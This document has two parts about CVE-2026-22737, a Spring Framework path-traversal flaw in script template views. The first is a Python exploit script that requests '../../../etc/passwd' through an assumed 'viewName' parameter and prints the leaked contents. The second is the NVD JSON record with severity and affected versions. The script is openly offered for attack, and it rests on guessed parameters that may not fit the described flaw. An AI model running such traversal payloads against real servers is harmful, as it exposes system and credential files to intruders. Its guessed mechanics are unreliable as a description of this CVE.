CVE-2026-22737

import requests # Target URL (Hypothetical endpoint using script template views) target_url = "http://vulnerable-spring-app/render" # Malicious payload attempting to perform path traversal # Attempting to read /etc/passwd from the server payload = { # The parameter name depends on the controller configuration, assuming 'viewName' "viewName": "../../../etc/passwd" } try: print("[+] Sending exploit request to CVE-2026-22737 vulnerable endpoint...") response = requests.get(target_url, params=payload, timeout=10) if response.status_code == 200: print("[!] Request successful. Checking for file content disclosure...") if "root:" in response.text: print("[+] Exploit successful! Sensitive file content disclosed:") print(response.text[:500]) # Print first 500 chars else: print("[-] Response received, but file content pattern not found.") else: print(f"[-] Exploit failed. HTTP Status Code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred during the request: {e}")

{"cve": {"id": "CVE-2026-22737", "sourceIdentifier": "[email protected]", "published": "2026-03-20T00:16:15.837", "lastModified": "2026-04-23T14:20:14.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Use of Java scripting engine enabled (e.g. JRuby, Jython) template views in Spring MVC and Spring WebFlux applications can result in disclosure of content from files outside the configured locations for script template views. This issue affects Spring Framework: from 7.0.0 through 7.0.5, from 6.2.0 through 6.2.16, from 6.1.0 through 6.1.25, from 5.3.0 through 5.3.46."}, {"lang": "es", "value": "El uso de vistas de plantilla con motor de scripting de Java habilitado (p. ej., JRuby, Jython) en aplicaciones Spring MVC y Spring WebFlux puede resultar en la divulgación de contenido de archivos fuera de las ubicaciones configuradas para las vistas de plantilla de script. Este problema afecta a Spring framework: de 7.0.0 a 7.0.5, de 6.2.0 a 6.2.16, de 6.1.0 a 6.1.25, de 5.3.0 a 5.3.46."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.3.47", "matchCriteriaId": "E4FC0718-4A47-49D5-B623-285871B5135F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0", "versionEndExcluding": "6.1.26", "matchCriteriaId": "08D94F4A-EDD9-4CA2-836A-D61B17A4E894"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0", "versionEndExcluding": "6.2.17", "matchCriteriaId": "1168AB82-987E-473E-8485-DE606AF254EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.6", "matchCriteriaId": "1CA275C7-33A7-49A2-ADE8-0ABF81E00327"}]}]}], "references": [{"url": "https://spring.io/security/cve-2026-22737", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}